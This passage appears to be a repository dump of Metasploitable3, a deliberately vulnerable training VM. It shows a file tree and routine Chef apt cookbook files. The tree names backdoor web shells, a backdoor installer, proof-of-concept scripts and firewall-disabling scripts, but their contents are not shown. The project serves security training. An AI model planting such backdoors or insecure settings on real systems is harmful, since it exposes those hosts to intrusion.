├── .github └── ISSUE_TEMPLATE.md ├── .gitignore ├── COPYING ├── LICENSE ├── README.md ├── Vagrantfile ├── build.ps1 ├── build.sh ├── chef ├── cookbooks │ ├── apt │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── attributes │ │ │ └── default.rb │ │ ├── files │ │ │ ├── 15update-stamp │ │ │ └── apt-proxy-v2.conf │ │ ├── libraries │ │ │ └── helpers.rb │ │ ├── metadata.json │ │ ├── metadata.rb │ │ ├── recipes │ │ │ ├── cacher-client.rb │ │ │ ├── cacher-ng.rb │ │ │ ├── default.rb │ │ │ └── unattended-upgrades.rb │ │ └── templates │ │ │ ├── 01proxy.erb │ │ │ ├── 10dpkg-options.erb │ │ │ ├── 10recommends.erb │ │ │ ├── 20auto-upgrades.erb │ │ │ ├── 50unattended-upgrades.erb │ │ │ ├── acng.conf.erb │ │ │ └── unattended-upgrades.seed.erb │ ├── compat_resource │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── MAINTAINERS.md │ │ ├── README.md │ │ ├── files │ │ │ └── lib │ │ │ │ ├── chef_compat │ │ │ │ ├── copied_from_chef.rb │ │ │ │ ├── copied_from_chef │ │ │ │ │ └── chef │ │ │ │ │ │ ├── constants.rb │ │ │ │ │ │ ├── delayed_evaluator.rb │ │ │ │ │ │ ├── dsl │ │ │ │ │ │ ├── core.rb │ │ │ │ │ │ ├── declare_resource.rb │ │ │ │ │ │ ├── platform_introspection.rb │ │ │ │ │ │ ├── recipe.rb │ │ │ │ │ │ └── universal.rb │ │ │ │ │ │ ├── mixin │ │ │ │ │ │ ├── lazy_module_include.rb │ │ │ │ │ │ ├── notifying_block.rb │ │ │ │ │ │ ├── params_validate.rb │ │ │ │ │ │ ├── powershell_out.rb │ │ │ │ │ │ └── properties.rb │ │ │ │ │ │ ├── property.rb │ │ │ │ │ │ ├── provider.rb │ │ │ │ │ │ ├── provider │ │ │ │ │ │ ├── apt_repository.rb │ │ │ │ │ │ ├── apt_update.rb │ │ │ │ │ │ ├── noop.rb │ │ │ │ │ │ ├── support │ │ │ │ │ │ │ └── yum_repo.erb │ │ │ │ │ │ ├── systemd_unit.rb │ │ │ │ │ │ └── yum_repository.rb │ │ │ │ │ │ ├── resource.rb │ │ │ │ │ │ ├── resource │ │ │ │ │ │ ├── action_class.rb │ │ │ │ │ │ ├── apt_repository.rb │ │ │ │ │ │ ├── apt_update.rb │ │ │ │ │ │ ├── systemd_unit.rb │ │ │ │ │ │ └── yum_repository.rb │ │ │ │ │ │ └── resource_builder.rb │ │ │ │ ├── mixin │ │ 
│ │ │ └── properties.rb │ │ │ │ ├── monkeypatches.rb │ │ │ │ ├── monkeypatches │ │ │ │ │ ├── chef.rb │ │ │ │ │ └── chef │ │ │ │ │ │ ├── exceptions.rb │ │ │ │ │ │ ├── log.rb │ │ │ │ │ │ ├── mixin │ │ │ │ │ │ └── params_validate.rb │ │ │ │ │ │ ├── node.rb │ │ │ │ │ │ ├── property.rb │ │ │ │ │ │ ├── provider.rb │ │ │ │ │ │ ├── recipe.rb │ │ │ │ │ │ ├── recipe_hook.rb │ │ │ │ │ │ ├── resource.rb │ │ │ │ │ │ ├── resource │ │ │ │ │ │ └── lwrp_base.rb │ │ │ │ │ │ ├── resource_builder.rb │ │ │ │ │ │ ├── resource_collection.rb │ │ │ │ │ │ ├── resource_collection │ │ │ │ │ │ ├── resource_list.rb │ │ │ │ │ │ └── resource_set.rb │ │ │ │ │ │ ├── run_context.rb │ │ │ │ │ │ └── runner.rb │ │ │ │ ├── property.rb │ │ │ │ ├── recipe.rb │ │ │ │ ├── resource.rb │ │ │ │ └── resource │ │ │ │ │ └── lwrp_base.rb │ │ │ │ ├── chef_upstream_version.rb │ │ │ │ └── compat_resource.rb │ │ ├── libraries │ │ │ └── autoload.rb │ │ └── metadata.json │ ├── docker │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── libraries │ │ │ ├── docker_base.rb │ │ │ ├── docker_container.rb │ │ │ ├── docker_exec.rb │ │ │ ├── docker_image.rb │ │ │ ├── docker_image_prune.rb │ │ │ ├── docker_installation_package.rb │ │ │ ├── docker_installation_script.rb │ │ │ ├── docker_installation_tarball.rb │ │ │ ├── docker_network.rb │ │ │ ├── docker_plugin.rb │ │ │ ├── docker_registry.rb │ │ │ ├── docker_service.rb │ │ │ ├── docker_service_base.rb │ │ │ ├── docker_service_manager_execute.rb │ │ │ ├── docker_service_manager_systemd.rb │ │ │ ├── docker_service_manager_sysvinit_debian.rb │ │ │ ├── docker_service_manager_sysvinit_rhel.rb │ │ │ ├── docker_service_manager_upstart.rb │ │ │ ├── docker_tag.rb │ │ │ ├── docker_volume.rb │ │ │ └── helpers_service.rb │ │ ├── metadata.json │ │ ├── metadata.rb │ │ └── templates │ │ │ └── default │ │ │ ├── default │ │ │ ├── docker-wait-ready.erb │ │ │ └── docker.erb │ │ │ ├── sysconfig │ │ │ └── docker.erb │ │ │ ├── systemd │ │ │ ├── docker.service-override.erb │ │ │ ├── 
docker.service.erb │ │ │ ├── docker.socket-override.erb │ │ │ ├── docker.socket.erb │ │ │ └── tmpfiles.d.conf.erb │ │ │ ├── sysvinit │ │ │ ├── docker-debian.erb │ │ │ └── docker-rhel.erb │ │ │ └── upstart │ │ │ └── docker.conf.erb │ ├── iptables │ │ ├── CHANGELOG.md │ │ ├── README.md │ │ ├── attributes │ │ │ └── default.rb │ │ ├── metadata.json │ │ ├── recipes │ │ │ ├── _package.rb │ │ │ ├── default.rb │ │ │ └── disabled.rb │ │ ├── resources │ │ │ ├── rule.rb │ │ │ └── rule6.rb │ │ └── templates │ │ │ └── default │ │ │ ├── iptables-config.erb │ │ │ ├── iptables_load.erb │ │ │ └── rebuild-iptables.erb │ ├── metasploitable │ │ ├── .delivery │ │ │ ├── build_cookbook │ │ │ │ ├── .kitchen.yml │ │ │ │ ├── Berksfile │ │ │ │ ├── LICENSE │ │ │ │ ├── README.md │ │ │ │ ├── chefignore │ │ │ │ ├── data_bags │ │ │ │ │ └── keys │ │ │ │ │ │ └── delivery_builder_keys.json │ │ │ │ ├── metadata.rb │ │ │ │ ├── recipes │ │ │ │ │ ├── default.rb │ │ │ │ │ ├── deploy.rb │ │ │ │ │ ├── functional.rb │ │ │ │ │ ├── lint.rb │ │ │ │ │ ├── provision.rb │ │ │ │ │ ├── publish.rb │ │ │ │ │ ├── quality.rb │ │ │ │ │ ├── security.rb │ │ │ │ │ ├── smoke.rb │ │ │ │ │ ├── syntax.rb │ │ │ │ │ └── unit.rb │ │ │ │ ├── secrets │ │ │ │ │ └── fakey-mcfakerton │ │ │ │ └── test │ │ │ │ │ └── fixtures │ │ │ │ │ └── cookbooks │ │ │ │ │ └── test │ │ │ │ │ ├── metadata.rb │ │ │ │ │ └── recipes │ │ │ │ │ └── default.rb │ │ │ ├── config.json │ │ │ └── project.toml │ │ ├── .gitignore │ │ ├── .kitchen.yml │ │ ├── Berksfile │ │ ├── README.md │ │ ├── attributes │ │ │ ├── apache_continuum.rb │ │ │ ├── default.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── mysql.rb │ │ │ ├── php545.rb │ │ │ ├── proftpd.rb │ │ │ ├── unrealircd.rb │ │ │ └── users.rb │ │ ├── chefignore │ │ ├── files │ │ │ ├── apache │ │ │ │ ├── cgi-bin.conf │ │ │ │ ├── dav.conf │ │ │ │ ├── hello_world.sh │ │ │ │ ├── php5.conf │ │ │ │ └── php5.load │ │ │ ├── apache_continuum │ │ │ │ └── data.tar.gz │ │ │ ├── chatbot │ │ │ │ └── chatbot.zip │ │ │ ├── cups │ 
│ │ │ └── cupsd.conf │ │ │ ├── drupal │ │ │ │ ├── default_site.tar.gz │ │ │ │ └── drupal.sql │ │ │ ├── flags │ │ │ │ ├── 10_of_clubs.wav │ │ │ │ ├── 2_of_spades.pcapng │ │ │ │ ├── 5_of_hearts.png │ │ │ │ ├── 7_of_diamonds.zip │ │ │ │ ├── 8_of_hearts.zip │ │ │ │ ├── Dockerfile │ │ │ │ ├── ace_of_clubs_b64.txt │ │ │ │ ├── five_of_diamonds │ │ │ │ ├── five_of_diamonds_srv │ │ │ │ ├── flag_images │ │ │ │ │ ├── 10 of spades.png │ │ │ │ │ ├── 3 of hearts.png │ │ │ │ │ └── 8 of clubs.png │ │ │ │ ├── joker.png │ │ │ │ ├── king_of_spades.png │ │ │ │ ├── my_recordings_do_not_open.iso │ │ │ │ └── super_secret_db.sql │ │ │ ├── knockd │ │ │ │ └── knockd │ │ │ ├── payroll_app │ │ │ │ ├── payroll_app.php │ │ │ │ └── poc.rb │ │ │ ├── phpmyadmin │ │ │ │ └── config.inc.php │ │ │ ├── proftpd │ │ │ │ ├── hosts_renewer.conf │ │ │ │ ├── hosts_renewer.rb │ │ │ │ ├── proftpd │ │ │ │ ├── proftpd_ip_renewer.conf │ │ │ │ └── proftpd_ip_renewer.rb │ │ │ ├── readme_app │ │ │ │ └── readme_app.conf │ │ │ ├── samba │ │ │ │ ├── passdb.tdb │ │ │ │ └── smb.conf │ │ │ ├── sinatra │ │ │ │ ├── Gemfile │ │ │ │ ├── aws │ │ │ │ │ └── loader │ │ │ │ ├── sinatra.conf │ │ │ │ └── virtualbox │ │ │ │ │ └── loader │ │ │ ├── sshd │ │ │ │ └── sshd_config │ │ │ └── unrealircd │ │ │ │ ├── ircd.motd │ │ │ │ ├── unrealircd │ │ │ │ └── unrealircd.conf │ │ ├── metadata.rb │ │ ├── recipes │ │ │ ├── apache.rb │ │ │ ├── apache_continuum.rb │ │ │ ├── chatbot.rb │ │ │ ├── clear_cache.rb │ │ │ ├── cups.rb │ │ │ ├── default.rb │ │ │ ├── docker.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── ifnames.rb │ │ │ ├── iptables.rb │ │ │ ├── knockd.rb │ │ │ ├── mysql.rb │ │ │ ├── nodejs.rb │ │ │ ├── payroll_app.rb │ │ │ ├── php_545.rb │ │ │ ├── phpmyadmin.rb │ │ │ ├── proftpd.rb │ │ │ ├── readme_app.rb │ │ │ ├── ruby23.rb │ │ │ ├── samba.rb │ │ │ ├── sinatra.rb │ │ │ ├── sshd.rb │ │ │ ├── unrealircd.rb │ │ │ ├── users.rb │ │ │ └── vm_tools.rb │ │ ├── spec │ │ │ ├── spec_helper.rb │ │ │ └── unit │ │ │ │ └── recipes │ │ │ │ ├── 
default_spec.rb │ │ │ │ └── mysql_spec.rb │ │ ├── templates │ │ │ ├── knockd │ │ │ │ └── knockd.conf.erb │ │ │ ├── payroll_app │ │ │ │ └── payroll.sql.erb │ │ │ └── readme_app │ │ │ │ └── start.sh.erb │ │ └── test │ │ │ ├── helpers │ │ │ └── chat_test.rb │ │ │ ├── linux │ │ │ ├── apache.rb │ │ │ ├── chatbot.rb │ │ │ ├── cups.rb │ │ │ ├── docker.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── knockd.rb │ │ │ ├── mysql.rb │ │ │ ├── nodejs.rb │ │ │ ├── php_545.rb │ │ │ ├── phpmyadmin.rb │ │ │ ├── proftpd.rb │ │ │ ├── readme_app.rb │ │ │ ├── ruby23.rb │ │ │ ├── samba.rb │ │ │ ├── sinatra.rb │ │ │ └── unrealircd.rb │ │ │ ├── smoke │ │ │ └── default │ │ │ │ ├── default_test.rb │ │ │ │ └── mysql.rb │ │ │ └── windows │ │ │ ├── 7zip.rb │ │ │ ├── apache_struts.rb │ │ │ ├── axis2.rb │ │ │ ├── backdoors.rb │ │ │ ├── boxstarter.rb │ │ │ ├── choco.rb │ │ │ ├── create_users.rb │ │ │ ├── devkit.rb │ │ │ ├── disable_auto_logon.rb │ │ │ ├── disable_firewall.rb │ │ │ ├── elasticsearch.rb │ │ │ ├── enable_rdp.rb │ │ │ ├── firewall.rb │ │ │ ├── flag_check.rb │ │ │ ├── ftp_site.rb │ │ │ ├── glassfish.rb │ │ │ ├── iis.rb │ │ │ ├── java.rb │ │ │ ├── jenkins.rb │ │ │ ├── jmx.rb │ │ │ ├── manageengine.rb │ │ │ ├── mysql.rb │ │ │ ├── openjdk6.rb │ │ │ ├── password_settings.rb │ │ │ ├── psexec.rb │ │ │ ├── rails_service.rb │ │ │ ├── ruby.rb │ │ │ ├── snmp.rb │ │ │ ├── tomcat.rb │ │ │ ├── wamp.rb │ │ │ ├── webdav.rb │ │ │ ├── winrm.rb │ │ │ └── wordpress.rb │ └── mysql │ │ ├── .foodcritic │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── libraries │ │ ├── helpers.rb │ │ ├── matchers.rb │ │ ├── mysql_base.rb │ │ ├── mysql_client_installation_package.rb │ │ ├── mysql_config.rb │ │ ├── mysql_server_installation_package.rb │ │ ├── mysql_service.rb │ │ ├── mysql_service_base.rb │ │ ├── mysql_service_manager_systemd.rb │ │ ├── mysql_service_manager_sysvinit.rb │ │ └── mysql_service_manager_upstart.rb │ │ ├── metadata.json │ │ └── templates │ │ └── default │ │ ├── apparmor │ 
│ ├── usr.sbin.mysqld-instance.erb │ │ ├── usr.sbin.mysqld-local.erb │ │ └── usr.sbin.mysqld.erb │ │ ├── my.cnf.erb │ │ ├── smf │ │ └── svc.method.mysqld.erb │ │ ├── systemd │ │ ├── mysqld-wait-ready.erb │ │ └── mysqld.service.erb │ │ ├── sysvinit │ │ └── mysqld.erb │ │ ├── tmpfiles.d.conf.erb │ │ └── upstart │ │ ├── mysqld-wait-ready.erb │ │ └── mysqld.erb └── dev │ └── ub1404 │ └── Vagrantfile ├── cortex.yaml ├── iso └── README.md ├── packer ├── answer_files │ └── 2008_r2 │ │ └── Autounattend.xml ├── http │ └── preseed.cfg ├── scripts │ └── virtio-win-drivers.sh └── templates │ ├── aws │ └── ubuntu_1404_ctf_2017.json │ ├── pro │ ├── ubuntu_1404_pro.json │ └── windows_2008_r2_pro.json │ ├── ubuntu_1404.json │ ├── vagrantfile-windows_2008_r2.template │ └── windows_2008_r2.json ├── resources ├── apache_struts │ ├── server.xml │ ├── struts.xml │ ├── struts2-rest-showcase.war │ └── tomcat-users.xml ├── backdoors │ ├── caidao.asp │ ├── meterpreter.php │ └── mma.php ├── certs │ ├── COMODORSAAddTrustCA.crt │ ├── COMODORSAExtendedValidationSecureServerCA.crt │ ├── addtrust_external_ca.cer │ ├── baltimore_ca.cer │ ├── comodorsacertificationauthority.crt │ ├── comodorsadomainvalidationsecureserverca.crt │ ├── digicert.cer │ ├── equifax.cer │ ├── gdig2.crt │ ├── globalsign.cer │ ├── gte_cybertrust.cer │ ├── microsoft_root_2011.cer │ ├── oracle-cert.cer │ ├── thawte_primary_root.cer │ └── utn-userfirst.cer ├── download-windows-files.ps1 ├── download-windows-files.sh ├── flags │ ├── ace_of_hearts.jpg │ ├── four_of_clubs.wav │ ├── hahaha.jpg │ ├── jack_of_clubs.png │ ├── jack_of_diamonds.b64 │ ├── jack_of_hearts.docx │ ├── joker.html │ ├── kingofclubs.exe │ ├── linux_flags │ │ ├── 10_of_clubs │ │ │ ├── 10 of clubs.png │ │ │ ├── 10_of_clubs.wav │ │ │ ├── extracted_flag.png │ │ │ ├── get_flag.rb │ │ │ └── make_wave.rb │ │ ├── 5_of_diamonds │ │ │ ├── five_of_diamonds │ │ │ ├── make_5_of_diamonds_http_server.rb │ │ │ └── source.png │ │ ├── 5_of_hearts │ │ │ ├── 5_of_hearts.png │ │ 
│ ├── extract_metadata.rb │ │ │ ├── fake.png │ │ │ ├── inject_metadata.rb │ │ │ └── source.png │ │ ├── 6_of_clubs │ │ │ ├── base64_string.txt │ │ │ ├── check_sinatra_vuln.rb │ │ │ ├── get_flag.rb │ │ │ ├── poc.rb │ │ │ ├── server │ │ │ ├── server.rb │ │ │ ├── source.png │ │ │ └── start.cr │ │ ├── 7_of_diamonds │ │ │ ├── 7_of_diamonds.zip │ │ │ ├── create_qr_hint.rb │ │ │ ├── extract_hint_from_qr.rb │ │ │ ├── hint.png │ │ │ ├── source.png │ │ │ └── zip_png.rb │ │ ├── 8_of_hearts │ │ │ ├── 8_of_hearts.zip │ │ │ ├── source.png │ │ │ └── zip_png.rb │ │ ├── ace_of_clubs │ │ │ ├── base64_string.txt │ │ │ ├── chatbot.zip │ │ │ └── source.png │ │ ├── joker_flag │ │ │ ├── convert.rb │ │ │ ├── joker.png │ │ │ ├── md5.txt │ │ │ └── source.png │ │ └── king_of_spades │ │ │ ├── fake.png │ │ │ ├── flag.png │ │ │ ├── flag_base64.txt │ │ │ ├── king_of_spades.png │ │ │ └── make_king_of_spades.rb │ ├── queen_of_hearts.sql │ ├── seven_of_hearts.html │ ├── seven_of_spades.pdf │ ├── six_of_diamonds.zip │ ├── ten_of_diamonds.png │ └── three_of_spades.png ├── glassfish │ ├── admin-keyfile │ └── domain.xml ├── iis │ └── applicationHost.config ├── jenkins │ ├── jenkins.exe │ └── jenkins.war ├── jmx │ ├── Hello.class │ ├── HelloMBean.class │ ├── SimpleAgent.class │ ├── jmx.exe │ └── start_jmx.bat ├── manageengine │ └── setup.iss ├── mysql │ ├── my.ini │ └── update_mysql_permissions.sql ├── rails_server │ ├── Gemfile │ ├── devkit │ │ └── dk.rb │ ├── gemrc │ ├── sqlite3-1.3.11-x64-mingw32.gemspec │ └── start_rails_server.bat ├── security_settings │ └── secconfig.cfg ├── wamp │ ├── httpd.conf │ ├── phpMyAdmin-3.5.2.2-english.zip │ ├── phpmyadmin.conf │ └── wampserver2.2d-x64.exe ├── webdav │ └── httpd-dav.conf ├── windows_pre_downloads │ └── .gitkeep └── wordpress │ ├── update_ip.ps1 │ ├── wordpress.sql │ └── wordpress.zip ├── scripts ├── chocolatey_installs │ ├── 7zip.bat │ ├── boxstarter.bat │ ├── chocolatey-compatibility.bat │ ├── java.bat │ ├── ruby.bat │ ├── tomcat.bat │ └── 
vcredist2008.bat ├── configs │ ├── apply_password_settings.bat │ ├── configure_firewall.bat │ ├── create_users.bat │ ├── disable-auto-logon.bat │ ├── disable_firewall.bat │ ├── enable-rdp.bat │ ├── enable_firewall.bat │ ├── microsoft-updates.bat │ ├── packer_cleanup.bat │ ├── update_root_certs.bat │ ├── vagrant-ssh.ps1 │ └── win-updates.ps1 └── installs │ ├── chocolatey.ps1 │ ├── install_backdoors.bat │ ├── install_devkit.bat │ ├── install_dotnet45.ps1 │ ├── install_elasticsearch.bat │ ├── install_flags.bat │ ├── install_manageengine.bat │ ├── install_openjdk6.bat │ ├── install_rails_server.bat │ ├── install_rails_service.bat │ ├── install_share_autorun.bat │ ├── install_wamp.bat │ ├── install_wmf.ps1 │ ├── install_wordpress.bat │ ├── openssh.ps1 │ ├── setup_apache_struts.bat │ ├── setup_axis2.bat │ ├── setup_ftp_site.bat │ ├── setup_glassfish.bat │ ├── setup_iis.bat │ ├── setup_jenkins.bat │ ├── setup_jmx.bat │ ├── setup_linux_share.bat │ ├── setup_mysql.bat │ ├── setup_rails_server.bat │ ├── setup_snmp.bat │ ├── setup_webdav.bat │ ├── start_glassfish_service.bat │ ├── start_wamp.bat │ └── vm-guest-tools.bat └── versions └── pro └── Vagrantfile /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Issue Description 2 | **Please check the [General Issues](https://github.com/rapid7/metasploitable3/wiki/General-Issues) section in the wiki before you submit the issue.** 3 | If you didn't find your issue mentioned, please give a thorough description of the issue you're seeing. 4 | Also, please be sure to include any troubleshooting steps that you've already attempted. 5 | 6 | ## Host System 7 | * OS: 8 | * Packer Version: 9 | * Vagrant Version: 10 | * VirtualBox Version: 11 | 12 | ## Command Output 13 | Copy the relevant command output here. 14 | If it's long, either post to a gist and add the link here, or isolate the error lines. 
15 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .vagrant/ 2 | packer_cache/ 3 | packer/builds/ 4 | resources/drivers/ 5 | resources/windows_pre_downloads/ 6 | *.vfd 7 | *.exe 8 | *.msi 9 | *.msu 10 | *.DS_Store 11 | *.box 12 | *.iso 13 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/files/15update-stamp: -------------------------------------------------------------------------------- 1 | APT::Update::Post-Invoke-Success {"touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true";}; 2 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/files/apt-proxy-v2.conf: -------------------------------------------------------------------------------- 1 | [DEFAULT] 2 | ;; All times are in seconds, but you can add a suffix 3 | ;; for minutes(m), hours(h) or days(d) 4 | 5 | ;; commented out address so apt-proxy will listen on all IPs 6 | ;; address = 127.0.0.1 7 | port = 9999 8 | cache_dir = /var/cache/apt-proxy 9 | 10 | ;; Control files (Packages/Sources/Contents) refresh rate 11 | min_refresh_delay = 1s 12 | complete_clientless_downloads = 1 13 | 14 | ;; Debugging settings. 
15 | debug = all:4 db:0 16 | 17 | time = 30 18 | passive_ftp = on 19 | 20 | ;;-------------------------------------------------------------- 21 | ;; Cache housekeeping 22 | 23 | cleanup_freq = 1d 24 | max_age = 120d 25 | max_versions = 3 26 | 27 | ;;--------------------------------------------------------------- 28 | ;; Backend servers 29 | ;; 30 | ;; Place each server in its own [section] 31 | 32 | [ubuntu] 33 | ; Ubuntu archive 34 | backends = 35 | http://us.archive.ubuntu.com/ubuntu 36 | 37 | [ubuntu-security] 38 | ; Ubuntu security updates 39 | backends = http://security.ubuntu.com/ubuntu 40 | 41 | [debian] 42 | ;; Backend servers, in order of preference 43 | backends = 44 | http://debian.osuosl.org/debian/ 45 | 46 | [security] 47 | ;; Debian security archive 48 | backends = 49 | http://security.debian.org/debian-security 50 | http://ftp2.de.debian.org/debian-security 51 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/libraries/helpers.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Library:: helpers 4 | # 5 | # Copyright:: 2013-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | module Apt 21 | # Helpers for apt 22 | module Helpers 23 | # Determines if apt is installed on a system. 24 | # 25 | # @return [Boolean] 26 | def apt_installed? 
27 | !which('apt-get').nil? 28 | end 29 | 30 | # Finds a command in $PATH 31 | # 32 | # @return [String, nil] 33 | def which(cmd) 34 | ENV['PATH'] = '' if ENV['PATH'].nil? 35 | paths = (ENV['PATH'].split(::File::PATH_SEPARATOR) + %w(/bin /usr/bin /sbin /usr/sbin)) 36 | 37 | paths.each do |path| 38 | possible = File.join(path, cmd) 39 | return possible if File.executable?(possible) 40 | end 41 | 42 | nil 43 | end 44 | end 45 | end 46 | 47 | Chef::Recipe.send(:include, ::Apt::Helpers) 48 | Chef::Resource.send(:include, ::Apt::Helpers) 49 | Chef::Provider.send(:include, ::Apt::Helpers) 50 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'apt' 2 | maintainer 'Chef Software, Inc.' 3 | maintainer_email 'cookbooks@chef.io' 4 | license 'Apache-2.0' 5 | description 'Configures apt and apt caching.' 6 | long_description IO.read(File.join(File.dirname(__FILE__), 'README.md')) 7 | version '7.2.0' 8 | 9 | %w(ubuntu debian).each do |os| 10 | supports os 11 | end 12 | 13 | source_url 'https://github.com/chef-cookbooks/apt' 14 | issues_url 'https://github.com/chef-cookbooks/apt/issues' 15 | chef_version '>= 13.3' 16 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/recipes/cacher-ng.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Recipe:: cacher-ng 4 | # 5 | # Copyright:: 2008-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the 'License'); 8 | # you may not use this file except in compliance with the License. 
9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an 'AS IS' BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | package 'apt-cacher-ng' 21 | 22 | directory node['apt']['cacher_dir'] do 23 | owner 'apt-cacher-ng' 24 | group 'apt-cacher-ng' 25 | mode '0755' 26 | end 27 | 28 | template '/etc/apt-cacher-ng/acng.conf' do 29 | source 'acng.conf.erb' 30 | owner 'root' 31 | group 'root' 32 | mode '0644' 33 | notifies :restart, 'service[apt-cacher-ng]', :immediately 34 | end 35 | 36 | service 'apt-cacher-ng' do 37 | supports restart: true, status: false 38 | action [:enable, :start] 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/recipes/unattended-upgrades.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Recipe:: unattended-upgrades 4 | # 5 | # Copyright:: 2014-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the 'License'); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an 'AS IS' BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | # On systems where apt is not installed, the resources in this recipe are not 21 | # executed. 
However, they _must_ still be present in the resource collection 22 | # or other cookbooks which notify these resources will fail on non-apt-enabled 23 | # systems. 24 | # 25 | 26 | package 'unattended-upgrades' do # ~FC009 27 | response_file 'unattended-upgrades.seed.erb' 28 | action :install 29 | end 30 | 31 | package 'bsd-mailx' do 32 | not_if { node['apt']['unattended_upgrades']['mail'].nil? } 33 | end 34 | 35 | template '/etc/apt/apt.conf.d/20auto-upgrades' do 36 | owner 'root' 37 | group 'root' 38 | mode '0644' 39 | source '20auto-upgrades.erb' 40 | end 41 | 42 | template '/etc/apt/apt.conf.d/50unattended-upgrades' do 43 | owner 'root' 44 | group 'root' 45 | mode '0644' 46 | source '50unattended-upgrades.erb' 47 | end 48 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/01proxy.erb: -------------------------------------------------------------------------------- 1 | Acquire::http::Proxy "http://<%= @server['host'] %>:<%= @server['port'] %>"; 2 | <% if @server['proxy_ssl'] %> 3 | Acquire::https::Proxy "http://<%= @server['host'] %>:<%= @server['port'] %>"; 4 | <% else %> 5 | Acquire::https::Proxy "DIRECT"; 6 | <% end %> 7 | <% unless @server['cache_bypass'].nil? %> 8 | <% @server['cache_bypass'].each do |bypass, type| %> 9 | Acquire::<%= type %>::Proxy::<%= bypass %> "DIRECT"; 10 | <% end %> 11 | <% end %> 12 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/10dpkg-options.erb: -------------------------------------------------------------------------------- 1 | # Managed by Chef 2 | DPkg::Options { 3 | <%= node['apt']['confd']['force_confask'] ? '"--force-confask";' : '' -%> 4 | <%= node['apt']['confd']['force_confdef'] ? '"--force-confdef";' : '' -%> 5 | <%= node['apt']['confd']['force_confmiss'] ? '"--force-confmiss";' : '' -%> 6 | <%= node['apt']['confd']['force_confnew'] ? 
'"--force-confnew";' : '' -%> 7 | <%= node['apt']['confd']['force_confold'] ? '"--force-confold";' : '' -%> 8 | } 9 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/10recommends.erb: -------------------------------------------------------------------------------- 1 | # Managed by Chef 2 | APT::Install-Recommends "<%= node['apt']['confd']['install_recommends'] ? 1 : 0 %>"; 3 | APT::Install-Suggests "<%= node['apt']['confd']['install_suggests'] ? 1 : 0 %>"; 4 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/20auto-upgrades.erb: -------------------------------------------------------------------------------- 1 | APT::Periodic::Update-Package-Lists "<%= node['apt']['unattended_upgrades']['update_package_lists'] ? 1 : 0 %>"; 2 | APT::Periodic::Unattended-Upgrade "<%= node['apt']['unattended_upgrades']['enable'] ? 1 : 0 %>"; 3 | <% if node['apt']['unattended_upgrades']['random_sleep'] -%> 4 | APT::Periodic::RandomSleep "<%= node['apt']['unattended_upgrades']['random_sleep'] %>"; 5 | <% end -%> 6 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/unattended-upgrades.seed.erb: -------------------------------------------------------------------------------- 1 | unattended-upgrades unattended-upgrades/enable_auto_updates boolean <%= node['apt']['unattended_upgrades']['enable'] ? 'true' : 'false' %> 2 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # compat_resource Cookbook CHANGELOG 2 | 3 | This file is used to list changes made in each version of the compat_resource cookbook. 
